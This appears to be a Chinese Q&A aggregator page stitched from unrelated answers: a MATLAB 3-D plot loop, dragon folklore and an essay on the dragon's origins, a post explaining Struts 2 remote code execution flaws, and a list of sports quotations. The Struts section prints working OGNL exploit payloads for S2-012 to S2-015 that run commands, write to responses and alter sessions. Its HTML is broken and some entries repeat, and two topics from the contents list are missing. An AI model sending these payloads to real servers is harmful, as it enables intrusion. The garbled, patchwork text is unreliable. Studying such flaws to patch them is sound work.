本文目录一览:
- 1、matlab 复杂函数 三维图
- 2、龙的问题
- 3、关于struts 2为什么会有代码执行漏洞的小帖子
- 4、关于运动的名言名句有哪些?
- 5、老公因诈骗被刑拘,现在23天了,是不是一个月后就会通知我怎么判的了
- 6、哪有放XSS跨站脚本工具的第三方工具/
matlab 复杂函数 三维图
用循环。
%你可以大致这样弄。
x=[1e16:1e16:9e16,1e17:1e17:9e17,1e18:1e18:9e18,1e19:1e19:1e20];
x=[1e16:2e16:9e16,1e17:2e17:9e17,1e18:2e18:9e18,1e19:2e19:1e20]; %降低点数
y=x;
xtickindex=1:5:length(x);
ytickindex=1:5:length(y);
xtick=x(xtickindex);
ytick=y(ytickindex);
[gx,gy]=meshgrid(x,y);
syms E
for i=1:size(gx,1)
for j=1:size(gx,2)
A=log10(gx(i,j)+gy(i,j))*E; %你的表达式计算出的值过大,我这里加一个log减小
B=(log10(gx(i,j))*log10(gy(i,j)))*E;
C=A*B;
gz(i,j)=double(int(C,E,1,2));
end
i
end
surf(gz)
xlabel('x')
ylabel('y')
zlabel('z')
set(gca,'xtick',xtickindex,'xticklabel',num2str(xtick(:),'%.1e'),...
'ytick',ytickindex,'yticklabel',num2str(ytick(:),'%.1e'));
龙的问题
传说,黄帝升天后,龙的九个儿子被老龙打入人间,不许他们再回天宫。从此,九条龙子再也没有升天。那么,它们兄弟九个在人间干什么?其实,人们在日常生活中,天天都会见到它,不过却很少有人知道它们叫什么名字。都在干什么?”
龙的长子叫(音毕希),它的长像鳖形龟貌,气力大,好负重。所以,它充当了人间石碑座子。很多人把坟墓里碑座误认为是鳖和龟,实际上都不对,它是龙的长子。
龙的二子叫螭吻。它喜欢挺而走险,爱在高空作业,鲁班就把它作为建筑物上的俏柱,立于屋顶。
龙的三子名叫蒲牟,它整天喜鸣爱吼。传说它的喊声可传十里以外。寺庙的和尚在铸钟时,把它铸在钟扭上,作为装饰品。
龙的四子叫狴犴。生来面貌威严,人人见了都害怕,衙门管法律的长官,就派它做了监狱门上龙头门环,震慑囚犯。后来有权有势的人,把它也用在自己家的大门狮子门环上。
龙的五子叫饕餮(音陶铁)嘴馋身懒,爱吃爱喝。民间就把它派用在各种烹饪鼎器上,如大铜茶壶。各种酒皿实物上。
龙的六子叫蚣蝮。它爱喜波弄水,常年累月在河水中玩耍。民间建桥工匠就把它作为桥上的桥标。
龙的七子叫睚眦(音崖自),嗜杀成癖。好像一天不杀生,它就活不下去,民间很厌恶它,后被衙门一名刽子手发现,就把它装饰在杀人的“鬼头刀”环上。它总算找到了适合自己的工作岗位。
龙的八子叫狻猊(音宣宜),它好烟火,闲下无事,到处 煽风点火,弄得民间乌烟瘴气。后被庙院里一位和尚发现,分配它作香炉上的装饰品,从此,它才安居乐业。
龙的九子叫椒图。它喜欢给人当警卫。民间不论谁家出了事,它整天整夜在人家大门口“站岗放哨”。后来民间就把它派用在大门上的龙头“门环”。
总之,龙的九个儿子孙虽说相貌不同,性格不一,爱好各异用场不同,但是基本上都达到“人尽其才,物尽其用”的目的。
______________________________________________________
龙起源于新石器时代早期,距离今天的时间不会少于八千年。这个时期,原始先民已不单纯地、被动地依靠上天的赏赐了,他们把猎获的野马野牛野猪等等畜养起来;也不单单吃那些是采拾得来的野果了,而是有选择地种植谷物以求收获。他们能够熟练地取火用火,学会了用木头搭简单的房子,开始磨制石器、骨器,手工制作陶器,逐渐定居下来,从事生产活动了。生产活动使人们同大自然的接触越来越宽泛,自然界作为人之外的不可思议的力量对人们精神世界的撞击也越来越大。
为什么鱼类穿游不居,湾鳄声形俱厉,蛇类阴森恐怖,蜥蜴形色怪异?为什么云团滚滚,电光闪闪,雷声隆隆,大雨倾盆?为什么海浪翻卷,虹贯长空,泥石流咆哮而下,吞吃人畜,所向披靡?……这些动物的行为和变化不已的自然天象对古人来说,是无法科学解释的。
他们模糊地猜测到,应当有那么一个力大无穷的,与“水”相关的“神物”主宰着指挥着操纵着管理着这些动物和天象,像一个氏族必有一个头领那样;或者说,这些动物和自然天象是这个“神物”的品性体现,像人要说话,要呼叫,要吃喝拉撒睡,要嘻笑怒骂一样。
龙,作为一种崇拜现象,一种对不可思议的自然力的一种“理解”,也就从这个时候起,开始了它的“模糊集合”。
辽宁阜新查海原始村落遗址出土的“龙形堆塑”,为我们的“时间定位”提供着证据。查海遗址属“前红山文化”遗存,距今约8000年。“龙形堆塑”位于这个原始村落遗址的中心广场内,由大小均等的红褐色石块堆塑而成。龙全长近20米,宽近两米,扬首张口,弯腰弓背,尾部若隐若现。这条石龙,是我国迄今为止发现的年代最早、形体最大的龙。(有文章称,山西省吉县柿子滩石崖上有一幅距今达一万年的鱼尾鹿龙岩画,当是龙的最早的雏形。这幅岩画未见发表,其面目如何,还不得而知。)接下来还有内蒙古敖汉旗兴隆洼出土的距今达七八千年的陶器龙纹,陕西宝鸡北首岭遗址出土的距今达七千年的彩陶细颈瓶龙纹,河南濮阳西水坡出土的距今六千四百多年蚌塑龙纹等。
龙的模糊集合过程的起点在新石器时代,经过商、周至战国时期的长足发展,到秦汉时便基本成形了。这个“基本”有两个意思,一是说构成龙的框架、要素、样式,秦汉时都基本具备了;二是说龙是一个开放的、不断纳新的系统,它并不满足秦汉时的基本成形,之后的历朝历代,直到今天,还都在不断地加减、变衍和发展。 龙是怎么形成的?历来众说纷纭,有从鳄、从蛇、从蜥蜴、从马、从猪、从闪电、从虹霓等等说法。笔者的观点是“模糊集合说”,其思路是这样的:新石器时代的先民是以原始思维面对身外世界的,而原始思维又是以直观表面性、整体关联性、非逻辑的神秘性和群体表象性为待征的“模糊思维”。这样的思维足以导致我们的祖先不清晰、不精确、不唯一地将身外世界的种种对象,集合、升华成若干个“神物”,然后加以崇拜。
在古人心目中,身外世界是神秘混沌难以捉摸的,模糊思维的直观性和表面性,使他们不可能像现代人这样,将云、雷电、虹、海潮、泥石流等分辨得清清楚楚;也不可能像现代人这样,运用丰富的生物学知识将鱼、鳄、蛇、蜥蜴,以及猪、马、牛等动物的生活习性研究得明明白白。在他们看来,云、雷电、虹等在天上弯转,都和雨相关,差不多是一类;鱼、鳄、蛇等在江河湖泊中穿游,都和水亲近,大体上也是一类;猪喜欢水,马、牛等也都离不开水--河马、水牛更是水中物。而且,天上的雨,落到地上便是水;水升到天上,再朝下落,便是雨。既然天上下的雨和地上流的水是一回事,那么,和雨相关的在天上弯转的云、雷电、虹等,就和与水密切的在江河湖泊中穿游的鱼、鳄、蛇等差不多都是一回事了。雨水适度,牧草丰茂,谷物有成;雨水乏缺,叶草干枯,百谷旱绝;雨水过量,人畜受淹,农田泡汤。生产和生活不能不依赖雨水,雨水却常常让人们依赖不上。再看这些与雨水相关的物象:云团滚滚翻卷,变化万方;雷电叱咤长空,霹雳千钧;虹霓垂首弓背,色像瑰奇;还有大小不一,脾性不同,长短参差,阴森怪异的鱼、鳄、蛇、蜥蜴等等:这一切是多么神秘,多么雄奇,多么可怖可畏啊枣令人惊惧不已!
于是,古人猜想了:一定有一个“神物”,主管这一切,总领这一切,支配这一切,排演这一切。这个“神物”,体型是很大的,而且是能大能小的;肤色是多样的,而且是能明能暗的;还应当是有头有尾的,能起能卧的,擅爬会游的,弯转曲折的,快速行进的;总之是能量巨大的,能上能下的,善于变化的,天上可飞水中可藏的,集合了种种“水物”特性的,又和雨水有着特别特别密切关系的。
该怎么称呼这个“神物”呢?人们发现,雨水降临时,乌云汹涌,电光闪闪,相伴随的,是“隆隆”的雷声;海潮涨落,龙卷风吸水,泥石流下山,也都发出“隆隆”的声响;而鳄、牛、蟒蛇等动物的吼叫,也和“隆隆”声接近;而“隆隆”声本身具备着粗壮、雄浑、深沉和悠远等特点,给予人的感觉是恐怖、壮烈、崇高和神秘。于是,人们就取其声,将这个模糊集合起来的“神物”,以“隆”这个音呼之了。
“神物”的发音是拟声,“神物”的形象该是个什么样子呢?一些人说像鱼,一些人说像鳄,一些人说像蛇,还有一些人说像云,像闪电,像虹霓;也可能今天看像这个,明天看像那个,后天看又像别一个;还可能觉得既是这个又是那个,升到天上就是云是闪电是虹,落到水中就是鱼是鳄是蛇,来到陆地就是猪是马是牛。模糊思维是不讲逻辑、意识不到矛盾的,这种思维容许同一个物体在同一个时间出现在不同的地方,容许部分和整体、单数和复数的同一。
造字的时代到了,需要给这个以“隆”音呼之的神物搞个符号了。老祖宗最初造字,多以像形为之。那么,让这个神物像什么形好呢?有人说像鳄,就造了几个像鳄的“龙”字;有人说像蛇,就造了几个像蛇的“龙”字;还有人说像闪电,就再造几个像闪电的“龙”字;另有人说身子像鳄像蛇还像闪电,头却像马像牛还像猪,那么就造几个像这像那像……的“龙”字好了。于是,甲骨文和金文中便有了各式各样的“龙”字。后来,逐渐演化,直到最后简化成现在这个“龙”。
这样,我们就可以说:龙是中国古人对鱼、鳄、蛇、猪、马、牛等动物,和云、雷电、虹霓等自然天象模糊集合而产生的一种神物。先民们是以现实生物和自然天象为基础,将自己的对身外世界的畏惧、依赖、疑惑、想象、崇拜等等,都贯穿、投注、体现到龙的模糊集合中了。
从审美的角度来看,龙无疑是古人的一种艺术创造。它是从鱼、鳄、蛇和云、电、虹等一个个具体物象而来,经过由众多人参与的模糊集合,形成一个建立在各个具体物象之上,又涵蕴着各个具体物象的新的形象。它的形成过程,是“美”的因素集纳的过程,用一句人们常说的话,就是“源于生活又高于生活”,其间渗透着、灌注着古人的神话猜想、宗教体味、审美快感和艺术情趣。
图腾(Totem),原为美洲印第安鄂吉布瓦人的方言词汇,意思是“他的亲族”。图腾崇拜的核心是认为某种动物、植物或无生物和自己的氏族有血缘关系,是本氏族的始祖和亲人,从而将其尊奉为本氏族的标志、象征和保护神。世界各国不少学者,都对图腾崇拜这一既古老又奇特的文化现象做过考察和研究,普遍认为世界上许多民族都曾经有过图腾崇拜,其残余在近现代一些民族中还可以看到。
最早提出龙图腾说的是闻氏一多。闻先生在他的一篇专门谈论龙凤的文章中这样说道:“就最早的意义说,龙与凤代表着我们古代民族中最基本的两个单元--夏民族和殷民族,因为在‘鲧死,……化为黄龙,是用出禹’和‘天命玄鸟(即凤),降而生商’两个神话中,人们依稀看出,龙是原始夏人的图腾,凤是原始殷人的图腾(我说原始夏人和原始殷人,因为历史上夏殷两个朝代,已经离开图腾文化时期很远,而所谓图腾者,乃是远在夏代和殷代以前的夏人和殷人的一种制度兼信仰),因之把龙凤当作我们民族发祥和文化肇端的象征,可说是再恰当没有了。”
那么,龙图腾是如何形成的呢?闻先生在他的名篇《伏羲考》说:龙这种图腾,“是只存在于图腾中而不存在于生物界中的一种虚拟的生物,因为它是由许多不同的图腾糅合成的一种综合体”;是“蛇图腾兼并与同化了许多弱小单位的结果”。
龙图腾说由20世纪40年代起步,至今流衍不衰,一度还成为占统治地位的观点。到了20世纪80年代,一些学者开始质疑龙图腾说,并出现一些否定性观点。如:“无论如何,图腾物总是自然界中实有的物体。因为说到底,图腾制体现的也正是人类与自然界之间的关系。因此,如果依据通行的理论和被学界接受的材料,龙作为一种图腾同时又不存在于自然界中是难以令人接受的。”(阎云翔)“迄今为止,考古学、历史学均无可信资料证明在中国历史上曾有过一个强大的以蛇为图腾的氏族部落,至于兼并与融合其他以马、狗、鱼、鸟、鹿为图腾的氏族部落的说法更是完全出于臆想。”(刘志雄、杨静荣)
学者们还指出,将中国古文物上出现的动物造型或纹饰视作图腾的表现形式,也是非常错误的。因为考古学中的某一类型文化与社会学中某一氏族部落是两个完全不同的概念。从时空范围上讲,前者比后者大得多。因此,某一类型文化中的某种纹饰与某一氏族的图腾划等号的可能性微乎其微。还有的学者从图腾文化的基本特征提出悖论,如:图腾是氏族群体成员崇敬的对象,是不得损伤、杀害和食用的,而在中国的古代典籍和神话传说中,不乏贬龙、辱龙、斗龙、斩龙以及食龙的载述。
总观龙图腾说的争论,觉得起码有这样两个问题值得思考:
一个问题是,图腾说来自西方学者,中国远古氏族部落是否也像澳洲土著、北美土著那样,有过一个图腾崇拜时期?分析古籍中的有关记载,回答似乎是肯定的。但是,按学界的普遍观点,图腾文化发生于旧石器时代中期,繁荣于旧石器时代晚期,进入新石器时代便趋于衰落,步入阶级社会,就只剩下一些残余在延续。按考古学提供的实物资料,龙的起源当是新石器时代开始以后的事,这样就产生了一个问题:图腾崇拜已走向衰落了,龙却起源了。将方兴未艾的龙归划于一个趋于衰落的崇拜现象,有悖于事物发展的基本逻辑。
另一个问题是,图腾概念有其原有的为学界所基本公认的内涵和外延,这样的图腾是严格意义上的图腾,或可称为“狭义图腾”。增其内涵、扩其外延之后的图腾,就不是严格意义上的图腾了,或可称之为“广义图腾”。严格意义上的图腾是自然界中存在的实物,而龙不符合这个条件,它们是自然界里没有的神物,因此,要说龙为图腾的话,就只能将龙划归到广义图腾的框框里。问题是,狭义图腾和广义图腾时不时地会发生冲突。比如,按狭义图腾的要求,图腾物是不得被侮辱被杀害的,而身为广义图腾物的龙却屡屡被惩罚被斩杀枣这个问题如何解释?如果要在狭义图腾和广义图腾之间选择的话,我倒更倾向于狭义图腾,因为我觉得图腾就是图腾,应该尊重原初的内涵和外延,如果太广义了,也就没有图腾了。
鉴于此,我在一系列谈龙的著作、文章中,都没有用“图腾”一词,而选用了“图徽”这一概念。
龙的神性可以用喜水、好飞、通天、善变、灵异、征瑞、兆祸、示威来概略。
在龙的神性中,“喜水”位居第一。这是因为,龙本来就是“水物”和“水相”,或者说,龙本源于“水物”和“水相”。龙的诸多的模糊集合对象,可以说都是“水物”或“水相”。鱼、鳄、河马、海马、水牛等生活在水中;蛇、蜥蜴喜处水湿阴潮之地;猪、陆牛、陆马、鹿等离开水也活不下去;而云、雷电、虹、海潮、龙卷风、泥石流等自然天象,全都和雨、水关系密切枣似乎完全可以用“水相”称之。本源于水物、水相的龙,怎么可能不“喜水”呢?
“喜水”的神性,使龙对行云布雨、司水理水的神职特别胜任。
“好飞”在龙的基本神性中占有特别重要的位置。龙之“好飞”,原因有这么几条:一是作为龙的模糊集合对象,云、雷电、虹霓等本来就是飞腾在空中的“天象”;二是鱼、鳄、蛇等在水中潜游之快,马、牛、鹿等在陆地上奔跑之速,都类似于“飞”;三是古人由于思维的模糊性,往往将潜游于水中的鱼、鳄、蛇等,奔跑于陆地上的马、牛、鹿等,和飞升腾跃在空中的云、雷电、虹霓等看成一个神物的不同表现,从而认为能在水中游、地上跑,也就能在天上飞。四是人类自从有了精神生活以后,就一直幻想超越自身的局限,摆脱现世的苦累,飞腾、翱翔到高妙阔远、有星星,有月亮,白云缭绕的空中去。而龙作为寄托着、体现着古人理想的神物,要是不能飞,不好飞,那也就不是龙了。
“好飞”的神性,使龙很自然、很方便地成为某些神仙、圣杰、帝王的乘御对象。
“飞”的方向和域界,自然是,也只能是神秘、辽阔、至高无上的天空。因此,“好飞”必然“通天”。早在浙江余姚河姆渡遗址出土的黑陶双耳盆上,就有将“鱼藻纹”和“鸟纹”刻划在一起的图案,陕西北首岭遗址出土的“鸟鱼纹”(亦称“龙凤纹”),也将天上飞的鸟同水中游的鱼枣龙的模糊集合对象联系起来,这就透示出,早在新石器时代早期,龙的模糊集合之初,龙就开始有了“通天”的意味。后世的许多建筑雕刻、绘画,人们都让神龙出现在浩渺无垠的昊天云气中,如北京故宫的云龙望柱、天坛的云龙石、孔庙的戏珠飞龙,等。
龙“喜水”,水聚流于地;龙“好飞”,飞升于云天。于是,龙就具备了沟通天地,做天地间的桥梁和信使的能力。那些帝王君主们之所以以龙自比,其根本点就在于瞅准了龙的“通天”的神性,和充当天地间桥梁和信使的能力。
由于龙是由众多的对象模糊集合而成的,各集合对象之间又存在着这样那样的差别,因此,龙又有了“善变”的神性。在古人的心目中,龙在天可以是云、是电、是虹,在地可以是猪、是马、是牛,在水可以是鱼、是鳄、是蛇。换句话说,天上的云、电、虹,地上的猪、马、牛,水中的鱼、鳄、蛇,等等,都可以是龙的变体和化身。
龙具备了“善变”的神性,而变,就免不了要变出些“灵光”、“灵通”、“灵妙”、“灵验”和“荒诞”、“离奇”、“怪异”来。因此,龙又有了“灵异”的神性,成为古人心目中的“四灵”(其它三灵是麟、凤、龟)之一。
人们造神、敬神的目的之一,是相信神能给自己带来好处。龙是古人模糊集合了众多的动物和天象,从而创造出来的神物,如果这个神物不能给人间带来福祉和祥瑞,古人创造它做什么呢?上述龙的种种神性,又都为龙的征兆吉祥嘉瑞的神性提供了基础:龙喜水,而水是生产、生活的命脉;龙好飞,飞是对超越苦难、摆脱困境的向往;龙通天,天是天帝和诸神居住的地方;龙善变,变是对生存环境的适应;龙灵异,灵异使龙神奇莫测、非凡不群。将这种种优长集中于一身,龙又怎么能不祥瑞呢?
龙可以“征瑞”,也可以“兆祸”。枣这倒也符合辩证法,其根据是现实的验证和历史的、道德的评价。如导致西周灭亡的“龙鼋之怪”、造成古时三苗地区大乱,的“日妖宵出,龙生于庙,犬哭于市”,等等。
龙的性情中,也有凶猛威厉、乖张易怒的一面。我们概而称之为“示威”。龙之“示威”,盖源于龙的模糊集合对象的习性和危害。如湾鳄凶残伤人,蛇类阴毒咬人,雷雨使江河水涨成灾,龙卷风卷走人畜树木,泥石流冲毁房舍田园,等等。古人对这些现象不会有科学的解释,只好以“龙怒”、“龙怨”、“龙报仇”、“龙做孽”等说之。
参考资料:
_________________________________________________________
中国龙的故事中国民间故事是中华文化中的一颗璀灿明珠,民间文学与小说故事丰富了我们的精神生活。. 当前位置:中国民间故事网首页 龙的故事. 龙的故事. [更多]
- 13K - 2005年10月26日 - 网页快照 - 更多此站结果
中国民间故事网 ... 当前位置:中国民间故事网首页 专题. 龙的故事. 龙的故事. 对龙的由来 ...
... - 8K - 2006年02月28日 - 网页快照
阿龙的故事 2002,a long de gu shi,aldgs 影视 ...用户评分:(/) 差好. 正在加载... 片长:90分钟. 推荐好友. 收录至网摘. ... 两人一起长大,互相勉励,片中扮演阿龙的谭耀文称:龙的故事,剧本朴素感人他在表演时曾几次落泪,邻家女孩的扮演者是首次冲进香港电影的李湘,梁家仁扮演父亲阿仁。 ...
... - 24K - 2006年02月28日 - 网页快照 - 更多此站结果
龙的故事_IT解题小组:全力打造专业电脑解题网站!加载中... 加载中... 龙的故事. 热 荐. 龙的故事. 作者:佚名 文章来源:不详 点击数: 更新时间:2005-9-5. 上一个FLASH: 不和谐的音符. 下一个FLASH: jvascript. 邮 箱 登 陆 : 设为首页 ... 您现在的位置: IT解题小组 FLASH 其它应用 FLASH正文. 龙的故事. 热 荐 ...
... - 42K - 2006年01月13日 - 网页快照 - 更多此站结果
龙的故事,龙的故事下载,搞笑龙的故事观看-爱上FLASH23flash-爱上FLASH FLASH中文欣赏门户为您提供最新最全的FLASH、小游戏资讯!一站在手、娱乐 ... 龙的故事 - 产品广告- FLASH 应用-爱上FLASH. 龙的故事. 全屏欣赏 ... 爱上FLASH. 名 称: 龙的故事. 大 小: 不详 KB ...
... - 38K - 2005年09月08日 - 网页快照 - 更多此站结果
YoYo女孩的故事-flash动画本 类 热 门. 新编唐僧收徒记. 液晶娃娃. YoYo女孩的故事. 寻声之音. 比我性福(贺闪吧改版) 新渔夫和金鱼故事. 特 别 推 荐. YoYo女孩的故事. 作者:sd728 大小:8310 加入时间: ... ·迈拓小龙 (sd728) ·毁灭者3外传-1 (sd728) ·龙的故事 (sd728) ...
- 14K - 2005年03月25日 - 网页快照 - 更多此站结果
龙的故事八仙斗花龙. 龙王输棋. 北宿成龙. 潘和伏秃龙. 岑港白老龙. 巧妹绣龙. 东海龙王塌东京. 青石龙. 管家老龙. 三戏海龙王. 锦线女龙. 桃花女龙. 龙女拜观音. 智斩独角龙. 龙头金钗. 煮海治龙王. 龙外孙的故事
- 4K - 2006年02月26日 - 网页快照 - 更多此站结果
Nature封面:奔龙的故事设为首页. 加入收藏. 联系站长. [组图]Nature封面:奔龙的故事. Nature封面:奔龙的故事. 副标题: 作者:张迪 文章来源:生物通 点击数: 更新时间:2005-10-18
... - 30K - 2005年12月12日 - 网页快照 - 更多此站结果
龙的故事... 龙的故事. 龙的故事. 第一章. 龙女拜观音 ...
- 5K - 2006年02月25日 - 网页快照 - 更多此站结果
龙的故事设为主页. 加入收藏. 加入收藏. 意见留言. 网站帮助 . FLASH发布. 华人男歌手 华人女歌手 乐队组合 动漫卡通 在线游戏 FLASH ... 位置:首页 作品分类其它应用产品广告 龙的故事 ... 【报告错误】 【龙的故事铃声】 ...
- 26K - 2005年09月12日 - 更多此站结果
___________________________________________________-
关于struts 2为什么会有代码执行漏洞的小帖子
Struts结构
把里面的例子在tomcat里部署一下,就可以测试了。简单说一下struts 2的结构。
struts 2的安装是在web.xml里添加这样的一句,将Struts2所带的过滤器org.apache.struts2.dispatcher.FilterDispatcher配置到工程的web.xml文件中,默认情况下,该过滤器拦截请求字符串中以.action结尾的请求,并将该请求委托给指定的Action进行处理
filter
filter-namestruts2/filter-name
filter-classorg.apache.struts2.dispatcher.ng.filter.StrutsPrepareAndExecuteFilter/filter-class
/filter
filter-mapping
filter-namestruts2/filter-name
url-pattern/*/url-pattern
/filter-mapping
关于action的定义是在struts.xml中,其中default-action-ref是所有action都捕获不到时的选项。
result type="redirectAction"的作用是捕获到该action重定向到其他页面。
最后include了另外一个XML
package name="default" namespace="/" extends="struts-default"
default-action-ref name="index" /
global-results
result name="error"/error.jsp/result
/global-results
global-exception-mappings
exception-mapping exception="java.lang.Exception" result="error"/
/global-exception-mappings
action name="index"
result type="redirectAction"
param name="actionName"HelloWorld/param
param name="namespace"/example/param
/result
/action
/package
include file="example.xml"/
这个example.xml定义了action的具体实现,最后一个action通配符这里{1}代表了第一个通配符所匹配到的字符串。
package name="example" namespace="/example" extends="default"
action name="HelloWorld" class="0610-9546-c0a9-2af6 example.HelloWorld"
result/example/HelloWorld.jsp/result
/action
action name="Login_*" method="{1}" class="9546-c0a9-2af6-6906 example.Login"
result name="input"/example/Login.jsp/result
result type="redirectAction"Menu/result
/action
action name="*" class="c0a9-2af6-6906-3412 example.ExampleSupport"
result/example/{1}.jsp/result
/action
!-- Add actions here --
/package
OGNL语法
struts使用了OGNL,虽然不知道为什,但是OGNL还是很强大的。
关于它的特性可以看下面的几个页面
Struts近期漏洞
漏洞列表,这里命令执行漏洞的利用方法,多是找到一处可以OGNL解析的地方,POC的构造大同小异
S2-015
官方描述
A vulnerability introduced by wildcard matching mechanism or double evaluation of OGNL Expression allows remote command execution.
触发条件
当*匹配到一串精心构造的OGNL语句时,会把它放到{1}中,形成OGNL二次执行。
action name="*" class="2af6-6906-3412-cd61 example.ExampleSupport"
result/example/{1}.jsp/result
/action
POC
一般来说Struts EXp中allowStaticMethodAccess和xwork.MethodAccessor.denyMethodExecution应该是常客,规定了OGNL中是否可以调用静态变量。
最后的.action是为了让拦截器捕捉,最后进入{1}的是前面的部分
${
%23context['xwork.MethodAccessor.denyMethodExecution']=!(%23_memberAccess['allowStaticMethodAccess']=true),
(@java.lang.Runtime@getRuntime()).exec('calc').waitFor()
}.action
如果页面返回像这样,说明执行成功,0是waitFor()返回的值。
HTTP ERROR 404
Problem accessing /struts2-blank/example/0.jsp. Reason:
Not Found
详细原理这里不作分析,因为别人都做好了。其中提到 JavaSnoop的代码审核工具,貌似不错。
S2-014
官方描述
A vulnerability introduced by forcing parameter inclusion in the URL and Anchor Tag allows remote command execution, session access and manipulation and XSS attacks
触发条件
URL标签的includeParams为get或all
s:url id="url" action="HelloWorld" includeParams="all"
Demo里面的情况如下,%{url}是上面定义的URL标签,当includeParams为all时,会把get或post提交的参数添加到自身的param列表中
li
s:url id="url" action="HelloWorld" includeParams="all"
s:param name="request_locale"en/s:param
/s:url
s:a href="%{url}"English/s:a
/li
POC
执行代码
{%23_memberAccess[%22allowStaticMethodAccess%22]=true,@java.lang.Runtime@getRuntime().exec('calc')}
修改Session
{%23session[%22hacked%22]='true'}
不过在执行的时候爆了一个错误,原因不明。
java.lang.ProcessImpl%40e3fda7
S2-013
官方描述
A vulnerability, present in the includeParams attribute of the URL and Anchor Tag, allows remote command execution
触发条件
这个洞和S2-014原理相同,因为官方没修不好而报了两次。
POC
这个可以成功执行
(%23_memberAccess%5B'allowStaticMethodAccess'%5D%3Dtrue)(%23context%5B'xwork.MethodAccessor.denyMethodExecution'%5D%3Dfalse)(%23writer%3D%40org.apache.struts2.ServletActionContext%40getResponse().getWriter()%2C%23writer.println('hacked')%2C%23writer.close())%7D
翻译成人类能看懂的,这个利用还是很有意思的
?fakeParam=%{(#_memberAccess['allowStaticMethodAccess']=true)(#context['xwork.MethodAccessor.denyMethodExecution']=false)(#writer=@org.apache.struts2.ServletActionContext@getResponse().getWriter(),#writer.println('hacked'),#writer.close())}
S2-012
官方描述
Showcase app vulnerability allows remote command execution
触发条件需要定义一个 type为redirect的result,从这里可以看出,直接把利用代码贴到${currentSkill.name}这里就可以了
action name="save" class="6906-3412-cd61-903b org.apache.struts2.showcase.action.SkillAction" method="save"
result type="redirect"edit.action?skillName=${currentSkill.name}/result
/action
POC
PRE class=code-java style="PADDING-BOTTOM: 0px; PADDING-TOP: 0px; PADDING-LEFT: 0px; MARGIN: 5px 5px 5px 15px; LINE-HEIGHT: 13px; PADDING-RIGHT: 0px" name="code"%{(#_memberAccess['allowStaticMethodAccess']=SPAN class=code-keyword style="COLOR: rgb(0,0,145)"true/SPAN)(#context['xwork.MethodAccessor.denyMethodExecution']=SPAN class=code-keyword style="COLOR: rgb(0,0,145)"false/SPAN) #hackedbykxlzx=@org.apache.struts2.ServletActionContext@getResponse().getWriter(),#hackedbykxlzx.println('hacked by kxlzx'),#hackedbykxlzx.close())}/PRE
PRE/PRE
H3A name=t8/AS2-011/H3
DIV官方描述,DOS和我关系不大/DIV
DIV sizcache="1" sizset="29"PRE class=html name="code"Long request parameter names might significantly promote the effectiveness of DOS attacks/PREBR
H3A name=t9/AS2-010/H3
/DIV
DIV官方描述/DIV
DIV这个是关于令牌的,看来命令执行漏洞是近期才涌现出来的。/DIV
DIV sizcache="1" sizset="30"PRE class=html name="code"When using Struts 2 token mechanism for CSRF protection, token check may be bypassed by misusing known session attributes/PREBR
BR
/DIV
BR
%{(#_memberAccess['allowStaticMethodAccess']=true)(#context['xwork.MethodAccessor.denyMethodExecution']=false) #hackedbykxlzx=@org.apache.struts2.ServletActionContext@getResponse().getWriter(),#hackedbykxlzx.println('hacked by kxlzx'),#hackedbykxlzx.close())}
S2-011
官方描述,DOS和我关系不大
Long request parameter names might significantly promote the effectiveness of DOS attacks
S2-010
官方描述
这个是关于令牌的,看来命令执行漏洞是近期才涌现出来的。
div class="3412-cd61-903b-b6ae dp-highlighter bg_html"
When using Struts 2 token mechanism for CSRF protection, token check may be bypassed by misusing known session attributes
关于运动的名言名句有哪些?
有关于运动的励志名言警句
1、运动不负有心人,坚持时日必奏效。
2、站如松,坐如钟,走如风。
3、一个埋头脑力劳动的人,如果不经常活动四肢,那是一件极其痛苦的事情。
4、体育运动不仅能改变人的体质,更能改变人的品格。
5、运动兴,民族兴;运动衰,民族衰。
6、娱乐是花,实务是根。如果要欣赏花的美丽,必须首先加强根的牢固。——爱默生
7、人人皆可参与体育运动,不管你是男或女,年长或年幼,健康或残疾,贫穷或富有,体育运动是人的一种权利,人人皆可乐在运动是人类社会的理想境界。
8、让体育运动成为一种习惯,成为你生活的一部分。
9、体育是包治百病延年益寿强身健体的灵丹妙药。
10、体育与教育一样,能使人更加健康健全。
11、友谊第一,比赛第二。
12、体育是填补空虚的最佳良药。
13、体育竞赛之最绝妙处乃由于它只在手做,不在口说。——赫尔巴特
14、滚动的石头不长青苔,运动的身体青春常在。
15、高尚的娱乐,对人生是宝贵的恩物。——鹤见右辅
16、长期的身体毛病使最光明的前途蒙上阴暗,而强健的活力就使不幸的境遇也能放金光。
17、岁月催人老,运动抗衰老。
18、体育精神是人性的永恒。
19、少年不煅烧,老来徒伤悲。
20、运动使人健康使人聪明使人快乐。
21、天天做体操,寿比南山松不老。
22、不言体育而空言道德,空言智识,言者暗矣,听者心厌矣,究于事实何俾华考范文网能使他养成忍受痛苦的习惯;为了使他将来受得住关节脱落腹痛和疾病的折磨,就必须使他历尽体育锻炼的种种艰苦。
23、铁不炼不成钢,人不练不健康。
24、晚霞诚可贵,健康价更高,欲图享老福,运动要抓牢。
25、我们必须有恒心,尤其要有自信心;我们必须相信我们的天赋是要用来做某种事情的,无论代价多么大,这种事情必须做到。——居里夫人
26、体育是在理性轨道上运行的竞争机制。
27、娱乐是花,实务是根。如果要欣赏花的美丽,必须首先加强根的牢固。
28、丰收靠劳动,强身靠运动。
29、一滴水只有放进大海里才永远不会干涸,一个人只有当他把自己和集体事业融合在一起的时候才能最有力量。——雷锋
30、各种娱乐的高下优劣,最能显示那个人的高下优劣。
31、腐蚀人性最可怕的东西是惰性,而体育是惰性的天敌。
32、人,只要有一种信念,有所追求,什么艰苦都能承受,什么环境也都能适应。——丁玲
33、体操和音乐二个方面并重,才能够成为完全的人格。因为体操能锻炼身体,音乐可以陶冶精神。
34、饭后百步走,活到九十九。
35、生命在于运动。——伏尔泰
36、参与体育运动,享受体育运动。
37、静而少动,体弱多病;有静有动,无病无痛。
38、体育是健力美三维一体的组合”。
39、各种娱乐的高下优劣,最能显示那个人的高下优劣。——麦肯
40、公平和平进步是竞技体育的核心价值。
41、体育是全社会共同的语言
42、今日不运动,来日悔晚矣。
43、一个人应养成信赖自己的习惯,即使在最危急的时候,也要相信自己的勇敢与毅力。——拿破仑
44、如果你想强壮,跑步吧!如果你想健美,跑步吧!如果你想聪明,跑步吧!——古希腊格言
45、身体教育和知识教育之间必须保持平衡。体育应造就体格健壮的勇士,并且使健全的精神寓于健全的体格。
46、运动太多和太少,同样的损伤体力;饮食过多与过少,同样的损伤健康;唯有适度可以产生增进保持体力和健康。
47、参与比胜负重要,过程比结果重要,超越比得失重要。
